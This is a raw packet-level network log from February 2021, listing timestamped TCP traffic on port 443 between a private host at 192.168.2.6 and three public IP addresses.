Feb 23, 2021 16:02:03.095900059 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095912933 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095927000 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095936060 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095944881 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095961094 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.095972061 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.095987082 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096010923 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096012115 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096036911 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096038103 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096061945 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096062899 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096071959 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096086025 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096111059 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096112967 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096122026 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096138954 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096151114 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096163034 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096185923 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096188068 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096195936 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096213102 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096216917 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096235991 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096250057 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096259117 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096282959 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096283913 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096296072 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096314907 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096349001 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096371889 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096395016 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096414089 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096415997 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096438885 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096451998 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096463919 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096484900 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096488953 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096510887 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096512079 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096523046 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096534967 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096555948 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096571922 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096575022 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096601963 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096611023 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096626043 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096647978 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096651077 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096672058 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096683025 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096700907 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096724987 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096736908 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096748114 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096771002 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096772909 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096801043 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096816063 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096873999 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096895933 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096918106 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096920967 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096941948 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.096946001 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096966982 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096991062 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.096996069 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097019911 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097038984 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097043037 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097067118 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097075939 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097090960 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097099066 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097112894 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097136974 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097136974 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097162962 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097173929 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097188950 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097207069 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097212076 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097229958 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097251892 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097251892 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097261906 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097275972 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097285986 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097312927 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097341061 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097366095 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097402096 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097417116 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097417116 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097443104 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097455025 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097470999 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097492933 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097496986 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097506046 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097523928 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097532988 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097548008 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097573042 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097588062 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097592115 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097615004 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097637892 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097637892 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097647905 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097666025 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097691059 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097692966 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097714901 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097727060 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097739935 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097754002 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097754002 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097778082 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097801924 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097815990 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097816944 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097845078 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.097868919 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.097898006 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217493057 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217529058 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217552900 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217571974 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217597961 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217622995 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217626095 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217647076 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217648029 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217669964 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217695951 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217696905 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217715979 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217727900 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217741966 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217758894 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217767000 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217789888 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217808962 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217814922 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217830896 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217840910 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217860937 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217864037 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.217879057 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217905045 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.217988014 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218017101 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218029976 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218044996 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218069077 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218070984 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218094110 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218097925 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218115091 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218120098 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218132973 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218144894 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218153000 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218169928 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218182087 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218194008 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218204975 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218221903 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218238115 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218250036 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218267918 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218276024 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218287945 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218301058 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218312979 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218326092 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218348026 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218378067 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218524933 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218552113 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218571901 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218576908 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218597889 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218601942 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218625069 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218626976 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218650103 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218651056 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218674898 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218676090 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218698025 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218703032 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218725920 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218729019 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218744993 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218754053 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218772888 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218794107 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.218945026 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218975067 CET	443	49719	52.144.52.222	192.168.2.6
Feb 23, 2021 16:02:03.218991995 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:03.219011068 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:12.890192032 CET	49719	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:12.890218019 CET	49720	443	192.168.2.6	52.144.52.222
Feb 23, 2021 16:02:19.794985056 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.795258999 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.814954042 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:19.815193892 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:19.839678049 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:19.839813948 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.839859009 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:19.839941025 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.874537945 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.874619007 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.921113968 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:19.921160936 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:19.921744108 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:19.921765089 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:19.921786070 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:19.921802998 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:19.921859980 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.921896935 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.922354937 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.949584007 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:19.961910009 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:19.961935043 CET	443	49738	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:19.962054968 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:19.962110043 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:19.989775896 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.996756077 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:19.997855902 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:19.997855902 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:19.998188019 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.003242016 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.004403114 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.034444094 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.034468889 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.034507036 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.034673929 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.035734892 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.042520046 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.042541981 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.042743921 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.047967911 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.048162937 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.048177958 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.048280001 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.049079895 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.049365997 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.049523115 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.049853086 CET	49736	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.050607920 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.050628901 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.050647020 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.050676107 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.050693989 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.050709963 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.050725937 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.050770044 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.051704884 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.051723003 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.051810980 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.052329063 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.052423000 CET	49735	443	192.168.2.6	104.16.19.94
Feb 23, 2021 16:02:20.098830938 CET	443	49741	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.099086046 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.100174904 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.129039049 CET	443	49735	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.135940075 CET	443	49736	104.16.19.94	192.168.2.6
Feb 23, 2021 16:02:20.145998001 CET	443	49738	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.146017075 CET	443	49738	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.146029949 CET	443	49738	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.146083117 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.146111965 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.147047997 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.147074938 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.147088051 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.147160053 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.147236109 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.169385910 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.169974089 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.170367956 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.170537949 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.170703888 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.187798977 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.188424110 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.247838974 CET	443	49741	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.248037100 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.251643896 CET	443	49741	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.251676083 CET	443	49741	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.251815081 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.315989017 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.316485882 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.316679001 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.317260027 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.317579985 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.317720890 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.317729950 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.317799091 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.318758965 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.323039055 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323067904 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323084116 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323096037 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323117018 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323134899 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323152065 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323168039 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323184013 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323203087 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323224068 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323226929 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.323246956 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323272943 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.323296070 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.323335886 CET	49737	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.335961103 CET	443	49738	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.335985899 CET	443	49738	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.336227894 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.336287975 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.337332964 CET	49738	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.389938116 CET	443	49738	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.463171959 CET	443	49741	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.464207888 CET	443	49741	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.464366913 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.464371920 CET	443	49741	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.464432955 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.465455055 CET	49741	443	192.168.2.6	204.93.216.87
Feb 23, 2021 16:02:20.469856024 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.469881058 CET	443	49737	204.93.216.87	192.168.2.6
Feb 23, 2021 16:02:20.469897985 CET	443	49737	204.93.216.87	192.168.2.6
